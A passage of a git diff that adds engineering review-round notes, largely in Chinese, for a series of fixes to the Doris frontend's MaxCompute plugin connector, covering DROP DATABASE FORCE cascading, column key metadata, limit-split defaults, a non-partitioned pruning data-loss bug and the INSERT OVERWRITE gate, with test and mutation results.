`listTableNamesFromRemote` 调同一 `listTableNames`,legacy `dropDbImpl:143` 同样暴露。Rule 3 不扩范围。 +- nit②(out-of-scope):`dropDb` 把 **local** dbName 直传 SPI(不像 dropTable/createTable 远端解析)。pre-existing,与已发布的非-force 3 参路径完全一致。归 DG-3/DG-4 DB-DDL triage 批次。 + +## 实现 + +**改 5 文件**(设计逐字落地): +1. SPI `ConnectorSchemaOps.java`:加 additive 4 参 `default void dropDatabase(session, db, ifExists, force)` 委托 3 参(零破坏其余 6 连接器;唯 MaxCompute override)。 +2. 连接器 `MaxComputeConnectorMetadata.java`:3 参 override 折成 4 参,`if(force)` 时 `structureHelper.listTableNames` 枚举 + 逐 `dropTable(...,true)`(catch OdpsException→DorisConnectorException 包,fail-loud)再 `dropDb`,镜像 legacy `dropDbImpl:142-155`。 +3. fe-core `PluginDrivenExternalCatalog.dropDb:351`:改调 4 参传 `force` + 更正 Javadoc("force 不转发"→"force 转发、连接器级联")。 +4. 测试 `PluginDrivenExternalCatalogDdlRoutingTest.java`:3 处 3 参 stub→4 参(:139/:151/:167)+ 新增 `testDropDbForceForwardsForceTrueToConnector` / `testDropDbNonForceForwardsForceFalseToConnector`。 +5. 新测 `MaxComputeConnectorMetadataDropDbTest.java`(连接器,hand-written recording fake McStructureHelper,无 mockito):force 级联序 / 非-force 不级联 / 空库 / 中途失败 fail-loud 4 测。 + +**守门**:编译 api+maxcompute+fe-core `BUILD SUCCESS`;UT `MaxComputeConnectorMetadataDropDbTest` 4/4 + `PluginDrivenExternalCatalogDdlRoutingTest` 19/19;checkstyle 3 模块 0;import-gate 净;mutation 三向红: +- fe-core `force`→`false` ⇒ `testDropDbForceForwardsForceTrueToConnector` 红(Argument(s) are different,force=true vs false)。 +- 连接器删 `if(force){...}` 块 ⇒ `forceTrueCascadesAllTablesBeforeDroppingSchema`(log=[dropDb:db1])+ `forceTrueSurfacesRemoteDropFailure`(无异常抛)双红;非-force/空库测仍绿。 +- 连接器 `dropTable(...,true)`→`false` ⇒ `forceTrueCascades...` 红(":false" markers)——见 Round 1 改进。 + +## Round 1(impl 对抗 review,workflow `wpszxgfau`,4 lens find → verify) + +7+ raw findings,2 非-nit 入 verify: +- **REFUTED**:`listTableNames` 裸 RuntimeException 逃逸未包 DdlException ——仍 fail-loud(非 swallow,不违 Rule 12)、**非新增**(legacy 与已发布非-force 路径同样暴露)、pre-existing 已 triage(nit①)。Rule 3 不扩范围。 +- **REAL(shouldConsider,已修)**:cascade 硬编码 `dropTable(...,true)`(idempotency-under-race,镜像 legacy `dropTableImpl(tbl,true)`),但 fake 丢弃 `ifExists` 实参、无断言钉住 → `true→false` mutation 可漏(4 测全绿)。Rule 9 真空隙。**处置**:fake 改记 `"dropTable::"`,`forceTrueCascades...` 断言期望 `:true`;重测 4/4 绿 + mutation `true→false` 现红(":false")。 + +**收敛**:0 mustFix。Round 1 唯一 real 已修(test-quality)。 + +## 累计结论 + +- **根因**(DG-3):翻闸后 `PluginDrivenExternalCatalog.dropDb` 拿到 `force` 却不转发(SPI 无 force 参),连接器 `dropDatabase` 仅 `schemas().delete()` 无表清理 → 非空库 DROP DB FORCE 退化为非-force(ODPS 不自级联,legacy 的枚举循环本身为证)。 +- **修**:additive 4 参 `dropDatabase` SPI overload(零破坏)+ MaxCompute override cascade(连接器层枚举+逐表 drop 再删库,fail-loud)+ fe-core 转发 force。FE 级 bookkeeping 不变(单 logDropDb+unregisterDatabase = legacy db 级完整效果,无逐表 editlog)。 +- **真值闸**:UT 全绿 + mutation 三向红。live e2e(真实 ODPS:非空库 FORCE 删成功、非-FORCE 删失败)CI 跳,为标准真值闸。 +- **Batch-D 红线**:删 legacy `MaxComputeMetadataOps.dropDbImpl`(cascade 逻辑副本)须待本 fix 落(已落)。 +- **doc-sync(随后续批次)**:DG-3 在 `P4-cutover-review-findings.md`/T06c §5「记 OQ/可接受」措辞更正、deviations/decisions-log 登记 4 参 overload。 diff --git a/plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md new file mode 100644 index 00000000000000..992a7458e4ce6f --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md @@ -0,0 +1,73 @@ +# P4-T06e FIX-ISKEY-METADATA — Review Rounds + +> Issue P3-10 / NG-6 / F3 / F10 (minor, read/metadata, regression). +> Design: `plan-doc/tasks/designs/P4-T06e-FIX-ISKEY-METADATA-design.md`. +> Flow: design → design-validation workflow → implement → guards → impl-review workflow → commit. + +## Decision recap + +Cutover marked every MaxCompute column `isKey=false` (5-arg `ConnectorColumn` ctor default), so +`DESCRIBE ` showed `Key=NO`; legacy `MaxComputeExternalTable.initSchema` set `isKey=true` +for all columns. **User decision (2026-06-08): Fix — set `isKey=true` (legacy parity)**, +connector-local, no SPI change. + +## Round 0 — Design validation (workflow `wa9t0emta`, 3 lenses, clean-room) → 0 mustFix + +Lenses: completeness/other-sites · safety/parity · test-quality. **0 mustFix**; design corrections +folded in pre-implementation. + +- **completeness** — confirmed exactly 2 `ConnectorColumn` sites (`:138`/`:150`), the single FE + conversion point (`ConnectorColumnConverter.convertColumn` threads `isKey`), DESCRIBE reads + `Column.isKey()` via `IndexSchemaProcNode:92`. 1 **shouldFix (real)**: my design wrongly claimed + `information_schema.columns.COLUMN_KEY` was affected — it is **OlapTable-gated** + (`FrontendServiceImpl.describeTables:962-965`), empty for MC before+after, legacy never showed it + either → **scoped the fix to DESCRIBE-only; removed the information_schema assertion** from the + design/e2e. Noted a 3rd (harmless) `ConnectorColumn` site `PluginDrivenExternalTable:139-140` + (rename path) that *preserves* `isKey` → folded into design Completeness. +- **safety/parity** — could not break it. 1 nit (isReal=false): `isKey` is **not purely + display-only** — `UnequalPredicateInfer:278` + BE slot/column descriptors + (`DescriptorToThriftConverter:67`, `ColumnToThrift:59`) read it non-OLAP-guarded; but legacy fed + them `true`, so the fix restores exactly what they consumed (every other `isKey` branch is + OLAP/Schema-guarded and unreachable for MC). **Softened the design's "display-only" wording** to + "restores exact legacy `isKey=true` all planning/BE paths already consumed". +- **test-quality** — `buildColumn` test is non-vacuous and kills the `isKey true→false` mutation + (verified). 1 **shouldFix (real)**: the helper test can't catch a call site that *bypasses* + `buildColumn` (reverts to 5-arg) — `getTableSchema` needs an unmockable live `Table`; **e2e + DESCRIBE is the load-bearing gate** → acknowledged in design + a Rule-9 "why" comment in the test + class. 1 nit (real): helper-vs-inline is borderline (the 6-arg ctor's `isKey=true` is already + pinned by `ConnectorColumnTest:63`) → **kept the helper** for an MC-module mutation guard + + intent documentation + 2-site centralization (justified in design). + +## Guards (post-implementation) + +- **Build:** `:fe-connector-maxcompute -am` BUILD SUCCESS (only the connector module touched; no + SPI/fe-core change). +- **UT:** `MaxComputeConnectorMetadataIsKeyTest` 3/3; collateral pure-unit MC suite (Capability / + DropDb / ValidateColumns / ScanPlanProvider / BuildTableDescriptor + IsKey) **37/37**, 0 + failures. +- **checkstyle:** 0 violations. **import-gate:** clean. +- **mutation:** `buildColumn` `isKey true→false` → `Tests run: 3, Failures: 2` (kills + `testBuildColumnMarksKeyTrue` + `testBuildColumnKeyIndependentOfNullable`); restored green. + +## Round 1 — Impl review (workflow `wrx0n11ol`, 2 lenses, clean-room) → converged + +Lenses: correctness-parity · test-quality. **0 mustFix · 0 shouldFix.** Verdict: ready to commit. + +- **correctness-parity** — **0 findings.** Verified on the final code: `buildColumn` sets `isKey=true` + (6-arg ctor delegation, `isAutoInc=false`); both `getTableSchema` sites route through it (data + `nullable=col.isNullable()`, partition `nullable=true`); the partition `true` is in the *nullable* + arg position (not swapped with isKey); the only `new ConnectorColumn` in MC prod is now inside + `buildColumn`. Exact legacy parity vs `MaxComputeExternalTable:177-178/189-190`. Fix propagates to + DESCRIBE (`ConnectorColumnConverter:67`, preserved by `PluginDrivenExternalTable:140` rename path). + Diff is surgical (helper + 2 swaps + import). +- **test-quality** — 2 nits, no blockers. (a) nit isReal=false: independently confirmed the + `isKey true→false` mutant is killed and all 3 assertions are non-vacuous (`ConnectorType` has a + real `equals()`); Rule-9 comments factually accurate. (b) nit isReal=true: the call-site wiring + has no killing unit test (disclosed DV-017); the reviewer noted the "no usable public constructor" + phrasing was slightly overstated — `TableSchema`/`Column` are public-constructable; the precise + blocker is `Table`'s **package-private** ctor + no Mockito, and the only offline workaround (a + `com.aliyun.odps`-package fixture subclass overriding `getSchema()`) has no repo precedent (sibling + `getColumnHandles` is identically untested). **Folded in: softened the test-class javadoc to the + precise blocker** (test 3/3 + checkstyle 0 re-confirmed after the edit). No new prod change. + +**No prod logic change in Round 1** — only a test-javadoc wording precision. diff --git a/plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md new file mode 100644 index 00000000000000..dfeab77869991b --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md @@ -0,0 +1,124 @@ +# P4-T06e FIX-LIMIT-SPLIT-DEFAULT — Review Rounds + +> Issue P3-9 / NG-5 / F11 (major, read, regression). Also closes minors F2 / F12. +> Design: `plan-doc/tasks/designs/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md`. +> Flow: design → design-validation workflow → implement → guards (compile+UT+checkstyle+import-gate+mutation) +> → adversarial impl-review workflow → converge → commit. + +## Decision recap + +Cutover (`MaxComputeScanPlanProvider.planScan:199-202`) ignored the `enable_mc_limit_split_optimization` +session var (default false) and hard-stubbed `checkOnlyPartitionEquality`→false, so +`useLimitOpt = limit>0 && !filter.isPresent()` — limit-opt fired by default for any no-filter LIMIT +(opposite of legacy default-OFF) and never for the partition-equality path. **User decision (2026-06-08): +Fix — restore the legacy default-OFF three-gate**, connector-local, no SPI change. + +## Round 0 — Design validation (workflow `w17wzd0el`, 4 adversarial lenses, clean-room) + +Lenses: legacy-parity / correctness-lostrows / channel-feasibility / test-mutation. **0 mustFix.** +Verdict: "safe to implement as written". + +- **legacy-parity** — 2 nits isReal=false (both unreachable: `limit==0` is rewritten to + `LogicalEmptyRelation` by Nereids `EliminateLimit` and never reaches planScan, so `limit>0` ≡ + legacy `hasLimit()`; a single conjunct is never a CompoundPredicate(AND) because scan-node + conjuncts are split via `ExpressionUtils.extractConjunctionToSet`). 1 nit isReal=true: the + CAST-unwrap divergence is broader than the doc's single example (covers right-side literal CAST + and IN-element CAST too) — **doc-only**, folded into the design DV note + DV-016. +- **correctness-lostrows** — 1 nit isReal=true (the CAST-unwrap), verified **NOT** a lost-rows + defect: partition pruning is computed identically via Nereids `SelectedPartitions`, and the + converted `filterPredicate` is still passed to the read session on both the standard and + limit-opt paths (`MaxComputeScanPlanProvider:191,:208,:353`) as a backstop. Worst case is the opt + firing on a slightly broader (still pure-partition) set, opt-in (var default OFF). +- **channel-feasibility** — 0 findings. Confirmed: the `@VarAttr` is in `VariableMgr.toMap` under + the exact lowercase key; booleans serialize "true"/"false" (Boolean.parseBoolean-safe); the only + scan-node-creation path dereferences `ConnectContext.get()` unconditionally so the live scan + session always carries real session properties (errs OFF if ever absent); the + hardcoded-string + `getOrDefault(...,"false")` + parseBoolean pattern is byte-identical to the JDBC + connector convention. +- **test-mutation** — 1 **shouldFix** isReal=true: the RHS-literal guard + (`cmp.getRight() instanceof ConnectorLiteral`) had no killing test — a mutant accepting + `pt = region` (partcol=partcol) would survive. **Folded in: added test + `testPartitionColumnEqualsPartitionColumnIneligible` + mutation C.** Plus 2 nits isReal=true: + hardcode the literal var-key string in tests (not the prod constant) — done (`VAR_KEY`); and the + planScan wiring is untestable in-module (no fe-core/Mockito) — acknowledged, E2E is the sole + guard (recorded as DV-016, same posture as DV-015). + +### Design-validation actions folded in (pre-implementation) +- Added unit test for `pt = region` (RHS-literal guard) + mutation C. +- Tests build the session-property map with the literal `"enable_mc_limit_split_optimization"`. +- Broadened the CAST-unwrap DV note (all cast positions) in the design + DV-016. +- Acknowledged the planScan-wiring coverage gap (E2E-only) in the design Test Plan + DV-016. + +## Guards (post-implementation) + +- **Build:** `:fe-connector-maxcompute -am` BUILD SUCCESS (no SPI/fe-core change → only the + connector module touched). +- **UT:** `MaxComputeScanPlanProviderTest` 21/21 (3 pre-existing `toPartitionSpecs` + 18 new), + 0 failures/errors/skips. +- **checkstyle:** `:fe-connector-maxcompute checkstyle:check` 0 violations. +- **import-gate:** `tools/check-connector-imports.sh` clean (the hardcoded var-name string keeps + the connector free of any fe-core `SessionVariable` dependency). +- **mutation:** see table below. + +Each mutation: `cp`-restore the prod file, apply one change, `-am test -DfailIfNoTests=false`, +confirm red, restore. (The `-am` reactor needs `-DfailIfNoTests=false` or upstream `fe-thrift` +aborts with "No tests were executed!" — an early harness miss that was caught and fixed.) + +| # | mutation | killing test(s) | result | +|---|---|---|---| +| A | `isLimitOptEnabled` default `"false"`→`"true"` | `testLimitOptDisabledWhenVarAbsent` | Failures: 1 ✓ | +| B | comparison `getOperator() == EQ` → `!= EQ` | `testSinglePartitionEqualityEligible` + 3 others | Failures: 4 ✓ | +| C | drop `&& getRight() instanceof ConnectorLiteral` (→ `true`) | `testPartitionColumnEqualsPartitionColumnIneligible` | Failures: 1 ✓ | +| D | AND-loop guard: drop the `!` in `!isPartitionEqualityLeaf(conjunct,…)` | `testAndOfPartitionEqualitiesEligible` | Failures: 1 ✓ | +| E | drop `in.isNegated() ||` (NOT-IN no longer rejected) | `testNotInOnPartitionIneligible` | Failures: 1 ✓ | +| F1 | `shouldUseLimitOptimization`: `!limitOptEnabled` → `false` | `testGateClosedWhenVarDisabled` | Failures: 1 ✓ | +| F2 | `limit <= 0` → `limit < 0` | `testGateClosedWhenNoLimit` | Failures: 1 ✓ | +| G | drop IN-value guard `\|\| !isPartitionColumnRef(in.getValue(),…)` (added in Round 1) | `testInValueDataColumnIneligible` | Failures: 1 ✓ | + +Final green confirm (26 tests after Round 1): `Tests run: 26, Failures: 0, Errors: 0, Skipped: 0`. + +(Note: the first D variant `if (false)` left `conjunct` unused → checkstyle-bound-to-validate +went red before tests, an ambiguous "empty" capture; re-run with the negation-drop D above gives an +unambiguous test failure — the AND short-circuit is genuinely guarded.) + +## Round 1 — Impl review (workflow `walkff1vf`, 4 lenses, clean-room) → converged + +Lenses: correctness-vs-legacy / regression-other-paths / test-quality / edge-cases. +**1 mustFix (resolved this round) + benign nits.** Verdict after fix: converged, ready to commit. + +- **correctness-vs-legacy** — 0 mustFix. Independently traced the helper bodies against legacy + `checkOnlyPartitionEqualityPredicate` + gate; confirmed byte-faithful on every reachable shape + (incl. EQ_FOR_NULL rejected as a distinct operator). 1 nit isReal=true: `LIMIT 0` takes a + different *path* than legacy (`limit<=0` vs legacy `hasLimit()`=`limit>-1`) but is + correctness-equivalent (both yield 0 rows) and unreachable (Nereids folds `LIMIT 0` to EmptySet). +- **regression-other-paths** — 0 mustFix. Verified: standard read-session path byte-unchanged; + `requiredPartitions` flows into BOTH paths (FIX-PRUNE-PUSHDOWN preserved); no SPI change (all 3 + `planScan` signatures unchanged, zero external callers of the new helpers); session read NPE-safe + per `getSessionProperties()` never-null contract. 2 nits isReal=false (the contract-guaranteed + null-map; a nested-AND-as-single-conjunct broadening that is safe like the CAST DV). This lens + also executed the suite: 21/21 at the time. +- **test-quality** — **1 mustFix isReal=true (RESOLVED):** every `ConnectorIn` test used a + *partition* column as the IN value, so a mutant dropping `!isPartitionColumnRef(in.getValue(),…)` + (line 469) survived the suite — a real correctness invariant with legacy parity + (`MaxComputeScanNode:358-364`); a regressed guard would silently under-read on + `data_col IN (...) LIMIT n` with the var ON. **Fix: added `testInValueDataColumnIneligible` + (`data_col IN ('a','b')` → false); mutation G confirms it now goes red (Failures: 1).** Other + named concerns (no-filter→true arm, IN all-literal loop, Comparison-side col-ref check) verified + genuinely covered. 1 nit isReal=true: planScan gate(1) wiring is unit-untested (E2E-only) — the + acknowledged DV-016 posture, not a false-confidence claim. +- **edge-cases** — 0 mustFix. Probed EQ_FOR_NULL / nested AND-OR-NOT-Between-IsNull-Like-FunctionCall + conjuncts / both-literal / empty-IN / case-sensitivity / null; all handled correctly & conservatively. + 2 nits isReal=true (correctly-handled-but-untested edge cases + empty-IN returning true [legacy- + parity-faithful, unreachable, backstopped]). + +### Round 1 actions folded in +- **mustFix:** added `testInValueDataColumnIneligible` + mutation G (confirmed kill). +- **edge-case hardening (nits):** added `testEqForNullOnPartitionIneligible`, + `testBothLiteralsComparisonIneligible`, `testAndContainingNonLeafConjunctIneligible`, + `testEmptyInListMatchesLegacyEligible` (pins the deliberate legacy-parity empty-IN behavior). + Suite 21 → 26, all green; checkstyle 0. +- **doc-only:** the `LIMIT 0` path nit + the nested-AND broadening recorded in DV-016 alongside the + CAST-unwrap divergence. + +**No prod change in Round 1** — the implementation was already correct; the only change was test +coverage (the mustFix was a missing test, not a code defect). diff --git a/plan-doc/reviews/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-review-rounds.md new file mode 100644 index 00000000000000..1e716ca18d101b --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-review-rounds.md @@ -0,0 +1,37 @@ +# [P4-T06e] FIX-NONPART-PRUNE-DATALOSS (GAP8) — review rounds + +> issue 来源:Batch-D 红线扩充对抗复审 `wbw4xszrg`(schema-table unit,GAP8)。用户定 **Fix now,repro-test 先行**。 +> 设计:`plan-doc/tasks/designs/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-design.md`。 + +## 根因(5 处核码确认,见 design) +非分区 plugin 表 + WHERE → 静默 0 行。`supportInternalPartitionPruned()`=`!partCols.isEmpty()`(非分区=false) → `PruneFileScanPartition` else 支覆写 `SelectedPartitions(0,{},isPruned=true)` → `PluginDrivenScanNode.getSplits` 短路 0 split。坏 override=`35cfa50f988`(FIX-PART-GATES,dormant) + `072cd545c54`(P1-4,加短路激活)。 + +## 修法 +Option A:`PluginDrivenExternalTable.supportInternalPartitionPruned()` → 无条件 `true`(镜像 legacy `MaxComputeExternalTable`/`IcebergExternalTable`)。非分区 → `pruneExternalPartitions:78` 返 NOT_PRUNED → 扫全表。**通用插件层修复**(非 MC 专有:CatalogFactory SPI_READY_TYPES={jdbc,es,trino,max_compute} 全经 PluginDrivenExternalTable→LogicalFileScan→PluginDrivenScanNode;当前仅 MC 翻闸暴露)。 + +## 改动(4 文件) +1. `PluginDrivenExternalTable.java`:`return true` + cautionary 注释(编码 data-loss WHY,防回退)。 +2. `PluginDrivenExternalTablePartitionTest.java`:翻转钉错不变式的断言(`assertFalse`→`assertTrue`,方法名 `...ReportsNoPartitionsButStillOptsIntoPruning`)+ 重写 WHY + 类 Javadoc 更正。**此翻转即 repro**。 +3. `PluginDrivenScanNodePartitionPruningTest.java`:helper 契约测保留 + 澄清注释(isPruned+空 只对真分区表裁剪正确)。 +4. `test_max_compute_partition_prune.groovy`:加 `no_partition_tb` live-DV(直接 assertEquals 行数、无 .out 依赖、CI 跳)。 + +## 守门 +编译 BUILD SUCCESS;UT `PluginDrivenExternalTablePartitionTest` 6/6 + `PluginDrivenScanNodePartitionPruningTest` 5/5 全绿;**mutation**:还原 fix(`true`→`!isEmpty()`) → repro 断言红(`expected: but was:`,FIX-NONPART-PRUNE-DATALOSS 文案)→ 还原后绿(RAM 备份 /dev/shm,diff 确认 identical);checkstyle 0 violations;import-gate exit 0。 + +## Round 1 — 设计验证 workflow `wijd3qgk0`(4 lens clean-room 对抗) +**4 lens 全 design-sound,0 refuted。** 1 mustFix + 3 shouldFix → 全折入: +- **mustFix(Lens-2)**:fix 会令 `PluginDrivenExternalTablePartitionTest:98` 现 `assertFalse` 变红——该断言钉住 buggy 值(WHY 注释明文为 false 辩护)。**已翻转**为 assertTrue + 重写 WHY(= repro 本身)。 +- **shouldFix(Lens-2)更正 blast-radius**:原稿「仅 MC / 注释 aspirational」错。jdbc/es/trino 经 CatalogFactory SPI_READY_TYPES 同为 PluginDrivenExternalTable → 本 bug 通用插件层。**已更正 design**。Option A 对全部 4 类中性或有益(非分区 pruneExternalPartitions 返 NOT_PRUNED),绝不有害。 +- **shouldFix(Lens-2)MV-path**:QueryPartitionCollector:75/PartitionCompensator:246 对非分区改 true 后转分支但 benign=恢复 legacy parity(MaxComputeExternalTable/Iceberg 即无条件 true)。**已注 design**。 +- **shouldFix(Lens-3)test 基建**:全 rule-transform 需真 CascadesContext、fe-core 无 pattern 可抄 → **轻量翻转断言作主 repro**(复用 tableWithCacheValue harness,真生产代码跑空分区列)。**已采纳**。 +- Lens-1 root-cause skeptic 独立重推 5 步链每环成立、无逃逸路;Lens-4 确认 Option A 正确且优于冗余 guard(guard 对正确性冗余、不纳入,Rule 2/3),且不破坏「分区表裁剪到 0→0 行」合法语义。 + +## Round 2 — impl-review workflow `wza2khdb2`(2 lens 对抗) +**2 lens 全 approve,0 mustFix / 0 shouldFix。** +- **Lens A(correctness/completeness)**:prod diff 即 `return true`,注释每条 claim 对源码核实无误;grep 全树无其它 site 依赖旧行为(`PartitionCompensatorTest:371` 是 HMS-mock stub false、不涉本类;无残留旧不变式断言);分区表 + 合法 pruned-to-zero 无回归。 +- **Lens B(test-quality, Rule 9)**:独立**重跑 mutation**(还原→红→恢复→绿)确认 repro 非真空 + WHY 链对源码精确;helper 注释准确;groovy 行数断言对 DDL 正确、自验无 .out。 +- **nits(2,已修)**:① PartitionPruningTest 注释截断方法名 `...OptsIntoPruning` → 拼全;② groovy seed-doc 补 `select * from no_partition_tb;`。 +- **观察(非缺陷)**:实现扩既有 groovy 而非 design step-5 提的新文件——更优(复用 enable_profile×num_partitions×cross_partition 矩阵全模式覆盖非分区)。design 已注此分歧。 + +## 结论 +设计验证 + impl-review 双 workflow 收敛 0 mustFix。**确诊 live 静默丢行回归已修复**(通用插件层,恢复 legacy parity)。真值闸 = live ODPS 非分区表 + WHERE 返正确行集(DV,CI 跳,已加 groovy)。auto-memory [[catalog-spi-nonpartitioned-prune-dataloss]] 已记。 diff --git a/plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md new file mode 100644 index 00000000000000..0cd6020e22653c --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md @@ -0,0 +1,57 @@ +# FIX-OVERWRITE-GATE (P0-1) — 对抗 review 轮次记录 + +> issue: NG-1 (F42/F47) — INSERT OVERWRITE 整条被 `allowInsertOverwrite` 网关挡死(翻闸后表为 `PluginDrivenExternalTable`)。 +> 设计: `plan-doc/tasks/designs/P4-T06e-FIX-OVERWRITE-GATE-design.md` +> 流程: 每轮记结论防跨轮矛盾;最多 5 轮。 + +--- + +## Round 1(2026-06-07)— verdict: **needs-revision**(推翻设计「bare instanceof 可接受」的 deferral) + +**fix(round-1)**: `InsertOverwriteTableCommand.allowInsertOverwrite` else 分支追加 `|| targetTable instanceof PluginDrivenExternalTable` + import。UT `InsertOverwriteTableCommandTest`(positive+negative)。编译+UT 2/2 过;mutation 自证(去 arm+import → positive test 红 `expected: but was:`,negative 仍绿)。 + +**review 机制**: clean-room workflow `w5ke8sjaq`(13 agents)— Phase A 2 lens 只读码 → Phase B 每 finding 2 票对抗 refute → Phase C 解禁先验交叉核对。raw 5 → 存活 4(+1 borderline)。 + +**存活 findings**: +| # | sev | cat | 标题 | refute | 处置判定 | +|---|---|---|---|---|---| +| 1 | **major** | regression | bare instanceof 纳入 JDBC → `JdbcConnectorMetadata.getWriteConfig` 不透传 overwrite → JDBC INSERT OVERWRITE **静默退化为 plain INSERT(丢数据)** | 2/2 real | **必须修**(见下分析) | +| 2 | major | regression | 纳入 ES/Trino(`supportsInsert()=false`)→ 不在网关拒、改在 `PhysicalPlanTranslator:686-698` 抛**泛化** "does not support INSERT"(非 "OVERWRITE not supported") | 2/2 real | 修(窄化网关后自动 fail-loud 于网关,消息清晰) | +| 3 | minor/nit | correctness/style | 拒绝消息过期:"only support OLAP/Remote OLAP and HMS/ICEBERG"(漏 MaxCompute/plugin 类型)→ 误导 | 2/2 | round-2 顺手更正 | +| 4 | minor | test-quality | negative test `mock(TableIf.class)` 是 tautology(任何 instanceof 都 false)→ 只能抓"放宽为无条件 true"突变,抓不到具体 arm 删除 | 1/2(borderline) | round-2 强化:加"PluginDriven 但非 overwrite-capable(JDBC-backed)应被拒"用例 | + +**Phase C 交叉核对**: matchesDesignIntent=true(改动逐字符合设计);contradictsHistory=false(与 FIX-PART-GATES 决策① 不矛盾——此处 instanceof 已类型限定、下游统一,无需窄化;Batch-D 红线满足——本 fix 加 arm,legacy MC arm 与新 arm 共存);testVacuousRisk=true(positive test 非空、negative test 弱但够其声明范围)。**doc-sync 缺口**: task-list 仍 "6/6"、无 FIX-OVERWRITE-GATE 行、改动未 commit。 + +**关键裁决(Rule 7 + Rule 12)**: Phase C 把 findings #1/#2 归"设计已知 deferral / out-of-scope"。**本轮推翻该 deferral**: +- 事实核验(against code): `supportsInsert()` 存在(`ConnectorWriteOps:47` 默认 false;JDBC+MC override true;ES/Trino 继承 false);**无** overwrite-specific capability;MaxCompute `MaxComputeWritePlanProvider:167` `builder.overwrite(true)` → **真支持 overwrite**;JDBC `getWriteConfig`(`JdbcConnectorMetadata:289+`)**不透传 overwrite** → 真静默丢。 +- 修前 JDBC overwrite = 在网关被**大声拒**(不在 allow-list);修后(bare instanceof)= 通过网关 → 静默 plain INSERT。**=本 fix 引入的新静默丢数据路径**,即便底层 getWriteConfig gap 预先存在(此前不可达)。**Rule 12 不允许静默错误** → 必须窄化谓词,不能 ship bare instanceof。 +- ES/Trino 非数据 bug(已 fail-loud),但窄化谓词后顺带获得网关层清晰错误(消除"半接 dispatch"味)。 + +**round-2 计划(待用户定谓词窄化方案后执行)**: ① 窄化 `allowInsertOverwrite` 的 PluginDriven 分支(方案 A/B/C 见下,已 surface 用户);② 更正拒绝消息(#3);③ 强化 negative test(#4,加 JDBC-backed PluginDriven 应被拒用例,直接守门窄化谓词)。然后重跑 review。 + +**谓词窄化方案(surface 用户,2026-06-07)**: +- **A(推荐)**: SPI 加 `supportsInsertOverwrite()`(`ConnectorWriteOps` 默认 false,MaxCompute override true),网关 `instanceof PluginDrivenExternalTable && `。通用/SPI 对齐/未来连接器可 opt-in;JDBC/ES/Trino 在网关清晰拒(fail-loud);MC 恢复 parity。涉 fe-connector-api + fe-connector-maxcompute + fe-core(各小改)。 +- **B**: fe-core only,网关 `instanceof PluginDrivenExternalTable && "max_compute".equals(catalogType)`。最小、不动连接器、精确 legacy parity,但在通用 dispatch 点硬编码 "max_compute"(反 SPI)。 +- **C(不推荐)**: 保 bare instanceof + 登记 JDBC 静默丢 + ES/Trino 泛化错为 known deviation + 另开 ticket。违 Rule 12(新静默丢数据)。 + +**用户决策(2026-06-07)= Option A(SPI capability)。** + +--- + +## Round 2(2026-06-07)— fix: SPI capability `supportsInsertOverwrite()`;verdict: **CONVERGED(code sound)** + +**fix(round-2,3 模块)**: +1. `ConnectorWriteOps.java` 加 `default boolean supportsInsertOverwrite() { return false; }`(supportsInsert 后)。默认 false → 支持 plain INSERT 但不支持 overwrite 的连接器(jdbc/es/trino)在网关被**大声拒**,不静默退化。 +2. `MaxComputeConnectorMetadata.java` `@Override supportsInsertOverwrite()=true`(MaxComputeWritePlanProvider:167 `builder.overwrite(true)` 真支持)。 +3. `InsertOverwriteTableCommand.java`: 网关 PluginDriven 分支窄化为 `instanceof PluginDrivenExternalTable && pluginConnectorSupportsInsertOverwrite(...)`;helper 经 `catalog.getConnector().getMetadata(catalog.buildConnectorSession()).supportsInsertOverwrite()`(镜像 PhysicalPlanTranslator:657-686 访问式);+import PluginDrivenExternalCatalog;拒绝消息更正(不再误导)。 +4. test 强化(解 round-1 #4):3 用例 —— (a) overwrite-capable PluginDriven→放行;(b) **非 overwrite-capable PluginDriven(jdbc-like,capability=false)→拒**(回归守门);(c) `mock(TableIf)`→拒。 + +**编译+UT**: 3 模块编译 BUILD SUCCESS,UT 3/3 过(MVN_EXIT=0)。 +**mutation(Rule 9)**: 还原为 round-1 bare instanceof(去 `&&` clause+helper+import,干净编译)→ **唯 (b) 红**(`expected: but was:` = JDBC 静默退化场景),(a)(c) 仍绿。证 capability 网关必要、(b) 真守门。 + +**round-1 findings 关闭情况(待 round-2 review 确认)**: #1 JDBC 静默丢→jdbc 现于网关 fail-loud(capability=false)✓;#2 ES/Trino→现于网关 fail-loud 清晰消息✓;#3 误导消息→已更正✓;#4 tautology→已加 (b) 非空守门✓。pre-existing JDBC `getWriteConfig` overwrite gap 留另开 ticket(overwrite 现不可达,无 live 回归)。 + +**round-2 review 裁决(clean-room workflow `wo81wbi7x`,3 agents)**: **rawFindings=0 / survivors=0**(code-only 2 lens 零发现)。Phase C 交叉核对:`round1FindingsClosed=true`(逐条 against code 确认上述 4 项关闭)、`matchesDesignIntent=true`、`testVacuousRisk=false`((b) pin capability 语义、suite 对相关突变真能 fail)、`contradictsHistory=false`(与 FIX-PART-GATES 决策① 一致——本处谓词既类型限定又 capability-gated,是决策① 认可的"勿过宽"方向;Batch-D 红线满足——本 fix 加 PluginDriven arm 紧随 legacy MC arm,删 legacy 后覆盖不丢)。verdict=`minor-issues` **仅**由 doc-sync/commit 收尾项驱动(非代码缺陷)。 + +**结论:P0-1 代码 CONVERGED(2 轮)**。收尾:commit(code+test+design+review-rounds+task-list);doc-sync(HANDOFF :26 stale 的 round-1 描述更正、decisions-log 登记新 SPI 